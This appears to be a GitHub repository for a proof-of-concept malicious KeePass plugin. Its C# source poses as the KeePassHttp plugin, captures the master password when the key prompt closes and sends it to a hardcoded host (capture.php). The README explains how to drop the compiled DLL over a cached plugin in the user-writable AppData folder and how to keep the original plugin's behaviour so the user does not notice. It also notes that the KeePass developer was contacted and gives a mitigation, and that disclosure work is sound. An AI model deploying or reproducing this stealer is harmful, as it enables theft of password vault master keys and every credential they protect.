├── MaliciousPlugin.cs
├── README.md
└── images
    ├── Compiled_Plugin.png
    ├── Exfiltrated_Pass.png
    └── Plugin.png


/MaliciousPlugin.cs:
--------------------------------------------------------------------------------
 1 | using System.Net;
 2 | using System.Text;
 3 | 
 4 | using KeePass.Plugins;
 5 | using KeePass.Forms;
 6 | using KeePass.UI;
 7 | 
 8 | namespace KeePassHttp
 9 | {
10 | 	public sealed class KeePassHttpExt : Plugin
11 | 	{
12 | 		public override bool Initialize(IPluginHost host)
13 | 		{
14 | 			// when a window is added in KeePass we want to see if the 
15 | 			GlobalWindowManager.WindowAdded += WindowAddedHandler;
16 | 			return true;
17 | 		}
18 | 
19 | 		private void WindowAddedHandler(object sender, GwmWindowEventArgs e)
20 | 		{
21 | 			// we are only interested in getting the database key
22 | 			if (e.Form is KeyPromptForm)
23 | 			{
24 | 				// when the form is closing, capture the event using a delegate
25 | 				e.Form.FormClosing += delegate
26 | 				{
27 | 					// find the key entry form and cast as a SecureTextBoxEx
28 | 					var m_tbPassword = e.Form.Controls.Find("m_tbPassword", true)[0] as SecureTextBoxEx;
29 | 					if (m_tbPassword != null)
30 | 					{
31 | 						// the web server we host may return a 404, but we don't care
32 | 						try
33 | 						{
34 | 							string dontCare = new WebClient().DownloadString("http://192.168.1.228/capture.php?keepass_password=" + Encoding.UTF8.GetString(m_tbPassword.TextEx.ReadUtf8()));
35 | 						}
36 | 						catch { }
37 | 					}
38 | 				};
39 | 
40 | 				// we can remove the handler now (hopefully we have the database key)
41 | 				e.Form.FormClosed += delegate
42 | 				{
43 | 					GlobalWindowManager.WindowAdded -= WindowAddedHandler;
44 | 				};
45 | 			}
46 | 		}
47 |     }
48 | }
49 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Malicious KeePass Plugin
 2 | I have used the [KeePassHttp Plugin](https://github.com/pfn/keepasshttp) to demonstrate this PoC. I used the [KeePassHttp.plgx](https://github.com/pfn/keepasshttp/blob/master/KeePassHttp.plgx) file. It could quite easily be any other plugin.
 3 | 
 4 | I tested the PoC against KeePass Password Safe 2.49 (64-bit). This PoC is in no way a bad reflection of the KeePass application but it does demonstrate how the master key can be exfiltrated from a default installation of KeePass.
 5 | 
 6 | **Note:** This attack vector can only be used against pre-compiled plugins placed in the plugins cache.
 7 | 
 8 | ## The Plugin
 9 | The plugin itself isn't anything particularly complex, but the way in which KeePass compiles plugins and caches the compiled DLL is what interested me.
10 | 
11 | If you add a `.plgx` file to the KeePass Plugins directory, when KeePass is next started it will compile the file. You need elevated privileges to write to the Plugin directory which means you **cannot** just drop malicious plugins via a phishing attack or some other malware. Whilst this might not be a concern for a home user (they are probably logged in as an administrator anyway), it might be a concern in a corporate environment where the IT team have installed KeePass for non-privileged users. The `KeePassHttp.plgx` plugin is shown below:
12 | 
13 | ![The Plugin Directory](https://github.com/plackyhacker/Malicious-KeePass-Plugin/blob/main/images/Plugin.png?raw=true)
14 | 
15 | You could try and trick users in to dropping malicious plugins here, but there is an easier way.
16 | 
17 | ## The Compiled Plugin
18 | The compiled plugin is written to the users `AppData` folder, which is **writable** without a privileged account by default. It isn't inconceivable that a phishing attack or some other malware could drop a malcious plugin in to this directory to try amd elevate privileges, or gain access to a users sensitive data:
19 | 
20 | ![Compiled Plugin](https://github.com/plackyhacker/Malicious-KeePass-Plugin/blob/main/images/Compiled_Plugin.png?raw=true)
21 | 
22 | All we need to do is compile the malicious plugin as a DLL and drop it over the top of the compiled `KeePassHttp.dll` file, and ensuring the DLL is written and compiled according to the [plugin requirements](https://keepass.info/help/v2_dev/plg_index.html).
23 | 
24 | ## Exfiltration
25 | The next time the user opens KeePass, we can exfiltrate the master key using the malicious plugin:
26 | 
27 | ![Master Key](https://github.com/plackyhacker/Malicious-KeePass-Plugin/blob/main/images/Exfiltrated_Pass.png?raw=true)
28 | 
29 | ## Alleviate User Suspicions
30 | It is very likely that a user will miss their favourite plugin when you have overwritten it with your own. You could download the source code for the target plugin (if it is available - or even decompile it - it is a .Net assembly). You could then ammend it to suit your own needs and ensure the existing functionality is not altered.
31 | 
32 | # Mitigation
33 | I contacted the developer of KeePass, **Dominik Reichl**, before posting this, I wanted to make sure it wasn't an unknown attack vector. However, this is an instance where the functionality of a program might outweigh the risk, 'This cache highly improves the startup performance of KeePass'. Known security 'issues' in KeePass are posted [in the KeePass knowledge base](https://keepass.info/help/kb/sec_issues.html#cfgw).
34 | 
35 | The best mitigation is to be aware of how the KeePass plugins work. If you have any concerns about this type of attack vector then the `PluginCache` folder should be avoided, instead placing pre-compiled DLL plugins in the `C:\Program Files\KeePass Password Safe 2\Plugins` protected folder. A non-privileged user cannot overwrite these by default.
36 | 


--------------------------------------------------------------------------------
/images/Compiled_Plugin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/plackyhacker/Malicious-KeePass-Plugin/079e3941c5ce982faf20435924cf3c93d4bb8177/images/Compiled_Plugin.png


--------------------------------------------------------------------------------
/images/Exfiltrated_Pass.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/plackyhacker/Malicious-KeePass-Plugin/079e3941c5ce982faf20435924cf3c93d4bb8177/images/Exfiltrated_Pass.png


--------------------------------------------------------------------------------
/images/Plugin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/plackyhacker/Malicious-KeePass-Plugin/079e3941c5ce982faf20435924cf3c93d4bb8177/images/Plugin.png


--------------------------------------------------------------------------------